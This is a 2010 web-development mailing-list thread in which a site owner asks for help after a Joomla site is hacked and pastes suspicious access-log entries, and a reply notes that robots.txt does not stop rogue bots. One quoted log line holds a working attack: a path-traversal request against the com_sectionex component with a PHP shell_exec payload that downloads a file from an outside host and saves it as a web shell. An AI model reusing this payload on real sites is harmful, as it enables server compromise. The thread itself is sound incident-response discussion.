[thelist] block phishing

James O'Donnell jimmyropes at gmail.com
Sun Mar 28 11:49:29 CDT 2010


Robots.txt only work if the robot is a legitimate one that honors your
wishes.

A rogue will just go to whatever folder it wants to access regardless of
what rules are stated in robots.txt

-----Original Message-----
From: thelist-bounces at lists.evolt.org
[mailto:thelist-bounces at lists.evolt.org] On Behalf Of Bob Meetin
Sent: Sunday, 28 March, 2010 12:20
To: thelist at lists.evolt.org
Subject: [thelist] block phishing

I got a notice that one of my sites got hit yesterday, so I logged in, 
and identified the file mentioned, also found a couple php files that 
got dropped into webhome that were related.  I moved the files into an 
out of webroot folder for future scrutinization, then checked the server 
access log, found a number of entries at the approximate date stamp of 
the uploaded files that seemed to be related.

I am methodically going through the system looking for anything not 
locked down.  What I could use some help with is understanding if the 
access log entries are associated and how to lock out the intruders.  As 
IP addresses change I suspect it's more than simply editing the 
robots.txt or adding a line in the .htaccess.  Some of the suspicious 
entries look like:

123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200 
18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1" 
200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U; 
Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET 
CLR 3.5.30729)"

fat.php was one of the deposited files. 18:58 was the datestamp.

75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET 
/administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"

Related?  There is nothing (current) in the filesystem called host.php

80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET 
/index.php?option=com_sectionex&controller=../../../../../../../../../../../
../../../../../../../../../../../../../proc/self/environ%00%0F 
HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download 
http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt 
print_out.php');?>"

com_sectionex is a Joomla component.  There is also no legitimate file 
called print_out.php but which I found.

75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET 
/administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"

Suggestions for robots.txt:

|#Baiduspider
User-agent: Baiduspider
Disallow: /

#Others
User-agent: *
Disallow: /

Suggestions for .htaccess:

||<Files *.*>
        order allow,deny
        allow from all
        deny from 220.181.
</Files>

-Bob
|
-- 

* * Please support the community that supports you.  * *
http://evolt.org/help_support_evolt/

For unsubscribe and other options, including the Tip Harvester
and archives of thelist go to: http://lists.evolt.org
Workers of the Web, evolt ! 



More information about the thelist mailing list